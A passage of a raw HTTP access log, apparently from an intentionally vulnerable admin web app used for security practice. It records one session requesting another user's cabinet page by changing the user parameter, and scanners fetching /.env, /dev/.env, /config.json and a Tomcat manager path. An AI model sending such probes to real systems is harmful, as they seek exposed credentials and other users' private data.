Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: text/css,*/*;q=0.1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:38942
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-03-20 16:17:30] === HTTP Request ===
[2026-03-20 16:17:30] Main page accessed - IP: 172.30.0.12:38942
===================
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Via: 2.0 Caddy
X-Forwarded-Host: admin.vulnberries.ru
Sec-Gpc: 1
Upgrade-Insecure-Requests: 1
Te: trailers
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
X-Forwarded-For: 212.102.62.170
Sec-Fetch-Dest: document
Priority: u=0, i
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:38942
Path: /
URL: /
Method: GET
[2026-03-20 16:17:30] === HTTP Request ===
[2026-03-20 16:17:16] Salary page accessed - IP: 172.30.0.12:38942
===================
X-Forwarded-For: 212.102.62.170
Cookie: auth=sess_1773937269413174371; user_id=1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Priority: u=0
Authorization: Bearer Bearer eyJhbGciOiJIU...
Via: 2.0 Caddy
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept: */*
X-Forwarded-Proto: https
Te: trailers
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:38942
Path: /salary
URL: /salary
Method: GET
[2026-03-20 16:17:16] === HTTP Request ===
[2026-03-20 16:17:14] Defects page accessed - IP: 172.30.0.12:38942
===================
X-Forwarded-For: 212.102.62.170
Sec-Fetch-Site: same-origin
Authorization: Bearer Bearer eyJhbGciOiJIU...
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-Proto: https
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Te: trailers
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Priority: u=0
Cookie: auth=sess_1773937269413174371; user_id=1
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:38942
Path: /defects
URL: /defects
Method: GET
[2026-03-20 16:17:14] === HTTP Request ===
[2026-03-20 16:17:11] Cabinet page accessed - user_id: 20, IP: 172.30.0.12:38942
===================
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Encoding: gzip, deflate, br
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Te: trailers
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Priority: u=4
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-For: 212.102.62.170
Cookie: auth=sess_1773937269413174371; user_id=1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:38942
Query: user=20
Path: /cabinet
URL: /cabinet?user=20
Method: GET
[2026-03-20 16:17:11] === HTTP Request ===
[2026-03-20 16:17:04] Login page accessed - IP: 172.30.0.12:38942
===================
Via: 2.0 Caddy
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Sec-Fetch-Dest: document
Priority: u=0, i
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Forwarded-Proto: https
Te: trailers
Sec-Fetch-Site: same-origin
Cookie: auth=sess_1773937269413174371; user_id=1
X-Forwarded-For: 212.102.62.170
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:38942
Path: /login
URL: /login
Method: GET
[2026-03-20 16:17:04] === HTTP Request ===
[2026-03-20 16:17:03] Main page accessed - IP: 172.30.0.12:38942
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Priority: u=4
Accept: */*
X-Forwarded-For: 212.102.62.170
Via: 2.0 Caddy
Te: trailers
Cookie: auth=sess_1773937269413174371; user_id=1
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
X-Forwarded-Proto: https
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:38942
Path: /
URL: /
Method: GET
[2026-03-20 16:17:03] === HTTP Request ===
===================
Te: trailers
If-Modified-Since: Wed, 18 Feb 2026 18:50:14 GMT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: script
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
Accept: */*
X-Forwarded-For: 212.102.62.170
Sec-Fetch-Mode: no-cors
Cookie: auth=sess_1773937269413174371; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:38942
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-20 16:17:03] === HTTP Request ===
[2026-03-20 16:17:03] Main page accessed - IP: 172.30.0.12:38942
===================
Te: trailers
Sec-Fetch-Site: none
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Dest: document
X-Forwarded-For: 212.102.62.170
Sec-Fetch-User: ?1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:148.0) Gecko/20100101 Firefox/148.0
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: navigate
Priority: u=0, i
Cookie: auth=sess_1773937269413174371; user_id=1
Accept-Language: en-CA,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:38942
Path: /
URL: /
Method: GET
[2026-03-20 16:17:03] === HTTP Request ===
[2026-03-20 15:36:25] Login page accessed - IP: 172.30.0.12:55834
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.227.139
From: gptbot(at)openai.com
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, br, deflate
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55834
Path: /login
URL: /login
Method: GET
[2026-03-20 15:36:25] === HTTP Request ===
[2026-03-20 15:36:24] Defects page accessed - IP: 172.30.0.12:55834
===================
Accept: */*
X-Forwarded-Proto: https
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, br, deflate
From: gptbot(at)openai.com
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.227.139
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55834
Path: /defects
URL: /defects
Method: GET
[2026-03-20 15:36:24] === HTTP Request ===
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
Via: 2.0 Caddy
From: gptbot(at)openai.com
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.227.139
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, br, deflate
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55834
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-03-20 15:36:22] === HTTP Request ===
[2026-03-20 15:36:20] Goods page accessed - IP: 172.30.0.12:55834
===================
X-Forwarded-Host: admin.vulnberries.ru
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.227.139
Via: 2.0 Caddy
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55834
Path: /goods
URL: /goods
Method: GET
[2026-03-20 15:36:20] === HTTP Request ===
[2026-03-20 15:36:19] Logs page accessed - IP: 172.30.0.12:55834
===================
X-Forwarded-For: 74.7.227.139
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55834
Path: /logs
URL: /logs
Method: GET
[2026-03-20 15:36:19] === HTTP Request ===
[2026-03-20 15:36:17] Salary page accessed - IP: 172.30.0.12:55834
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.227.139
From: gptbot(at)openai.com
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, br, deflate
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55834
Path: /salary
URL: /salary
Method: GET
[2026-03-20 15:36:17] === HTTP Request ===
===================
X-Forwarded-For: 74.7.227.139
Referer: https://admin.vulnberries.ru/
From: gptbot(at)openai.com
Accept: */*
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55834
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-03-20 15:36:14] === HTTP Request ===
[2026-03-20 15:36:12] Cabinet page accessed - user_id: , IP: 172.30.0.12:55834
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.227.139
Via: 2.0 Caddy
From: gptbot(at)openai.com
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
Referer: https://admin.vulnberries.ru/
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55834
Path: /cabinet
URL: /cabinet
Method: GET
[2026-03-20 15:36:12] === HTTP Request ===
[2026-03-20 15:36:06] Main page accessed - IP: 172.30.0.12:55834
===================
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
From: gptbot(at)openai.com
Accept: */*
X-Forwarded-For: 74.7.227.139
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55834
Path: /
URL: /
Method: GET
[2026-03-20 15:36:06] === HTTP Request ===
===================
X-Openai-Host-Hash: 867116608
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.244.7
Via: 2.0 Caddy
From: oai-searchbot(at)openai.com
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55834
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-20 15:36:04] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:60238
Path: /jars
URL: /jars
Method: GET
[2026-03-20 15:15:45] === HTTP Request ===
[2026-03-20 15:04:23] Main page accessed - IP: 68.183.238.42:44896
===================
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 68.183.238.42:44896
Path: /
URL: /
Method: GET
[2026-03-20 15:04:23] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Via: 1.1 Caddy
Accept-Encoding: identity
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:51906
Path: /.env
URL: /.env
Method: GET
[2026-03-20 14:21:36] === HTTP Request ===
[2026-03-20 12:52:12] Main page accessed - IP: 176.65.149.45:51750
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:51750
Path: /
URL: /
Method: GET
[2026-03-20 12:52:12] === HTTP Request ===
[2026-03-20 12:00:19] Main page accessed - IP: 34.52.186.237:40068
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.52.186.237:40068
Path: /
URL: /
Method: GET
[2026-03-20 12:00:19] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Headers:
Protocol: HTTP/1.1
Host: dns.bakunin.me:8081
RemoteAddr: 27.115.124.40:4013
Path: /config.json
URL: /config.json
Method: GET
[2026-03-20 11:21:44] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Headers:
Protocol: HTTP/1.1
Host: dns.bakunin.me:8081
RemoteAddr: 27.115.124.34:1818
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-03-20 11:21:43] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Headers:
Protocol: HTTP/1.1
Host: dns.bakunin.me:8081
RemoteAddr: 27.115.124.48:8840
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-20 11:21:42] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: dns.bakunin.me:8081
RemoteAddr: 27.115.124.2:60371
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-20 11:21:42] === HTTP Request ===
[2026-03-20 11:21:22] Main page accessed - IP: 27.115.124.40:58354
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Headers:
Protocol: HTTP/1.1
Host: dns.bakunin.me:8081
RemoteAddr: 27.115.124.40:58354
Path: /
URL: /
Method: GET
[2026-03-20 11:21:22] === HTTP Request ===
[2026-03-20 11:20:54] Main page accessed - IP: 139.59.170.85:50128
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 139.59.170.85:50128
Path: /
URL: /
Method: GET
[2026-03-20 11:20:54] === HTTP Request ===
===================
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: dns.bakunin.me:8081
RemoteAddr: 101.199.254.206:10920
Path: /config.json
URL: /config.json
Method: GET
[2026-03-20 11:15:53] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Headers:
Protocol: HTTP/1.1
Host: dns.bakunin.me:8081
RemoteAddr: 101.199.254.201:3770
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-03-20 11:15:52] === HTTP Request ===
===================
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: dns.bakunin.me:8081
RemoteAddr: 101.199.254.239:7131
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-20 11:15:52] === HTTP Request ===
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Headers:
Protocol: HTTP/1.1
Host: dns.bakunin.me:8081
RemoteAddr: 101.199.254.230:40933
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-20 11:15:51] === HTTP Request ===
[2026-03-20 11:15:32] Main page accessed - IP: 101.199.254.233:63861
===================
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Headers:
Protocol: HTTP/1.1
Host: dns.bakunin.me:8081
RemoteAddr: 101.199.254.233:63861
Path: /
URL: /
Method: GET
[2026-03-20 11:15:32] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 130.12.180.34:9942
Path: /dev/.env
URL: /dev/.env
Method: GET
[2026-03-20 10:49:27] === HTTP Request ===
===================
Cache-Control: no-cache
Proxy-Connection: Keep-Alive
Pragma: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 64.62.156.92:23759
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-03-20 10:29:16] === HTTP Request ===
[2026-03-20 10:29:04] Main page accessed - IP: 64.62.156.82:5885
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 64.62.156.82:5885
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-03-20 10:29:04] === HTTP Request ===
[2026-03-20 10:27:24] Main page accessed - IP: 64.62.156.80:51250
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.62.156.80:51250
Path: /
URL: /
Method: GET
[2026-03-20 10:27:24] === HTTP Request ===
[2026-03-20 09:11:33] Main page accessed - IP: 34.38.201.223:40184
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.38.201.223:40184
Path: /
URL: /
Method: GET
[2026-03-20 09:11:33] === HTTP Request ===
[2026-03-20 09:11:15] Main page accessed - IP: 34.76.97.83:52832
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.76.97.83:52832
Path: /
URL: /
Method: GET
[2026-03-20 09:11:15] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 20.29.24.158:47574
Path: /manager/text/list
URL: /manager/text/list
Method: GET
[2026-03-20 08:38:54] === HTTP Request ===
[2026-03-20 06:33:48] Main page accessed - IP: 95.214.53.99:48512
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 95.214.53.99:48512
Path: /
URL: /
Method: GET
[2026-03-20 06:33:48] === HTTP Request ===
[2026-03-20 05:33:41] Main page accessed - IP: 172.30.0.12:57364
===================
Accept-Encoding: deflate, gzip
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 52.200.222.178
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57364
Path: /
URL: /
Method: GET
[2026-03-20 05:33:41] === HTTP Request ===
===================
X-Forwarded-Proto: https
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
X-Forwarded-For: 172.253.7.118
Sec-Fetch-Dest: image
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Platform: "Windows"
Priority: u=1, i
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="146", "Not:A-Brand";v="24", "Google Chrome";v="146"
Referer: https://admin.vulnberries.ru/login
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50698
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-20 05:22:18] === HTTP Request ===
[2026-03-20 05:22:18] Login page accessed - IP: 172.30.0.12:50698
===================
X-Forwarded-Proto: https
X-Forwarded-For: 172.253.7.118
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/cabinet?user={id
Accept-Language: en-US,en;q=0.9
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: "Chromium";v="146", "Not:A-Brand";v="24", "Google Chrome";v="146"
Sec-Fetch-Dest: document
Priority: u=0, i
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50698
Path: /login
URL: /login
Method: GET
[2026-03-20 05:22:18] === HTTP Request ===
===================
X-Forwarded-Proto: https
Via: 2.0 Caddy
Sec-Fetch-Dest: script
Accept-Language: en-US,en;q=0.9
X-Forwarded-For: 172.253.7.118
Referer: https://admin.vulnberries.ru/cabinet?user={id
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua: "Chromium";v="146", "Not:A-Brand";v="24", "Google Chrome";v="146"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50698
Path: /static/cabinet.js
URL: /static/cabinet.js
Method: GET
[2026-03-20 05:22:18] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-For: 172.253.7.118
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Priority: u=1
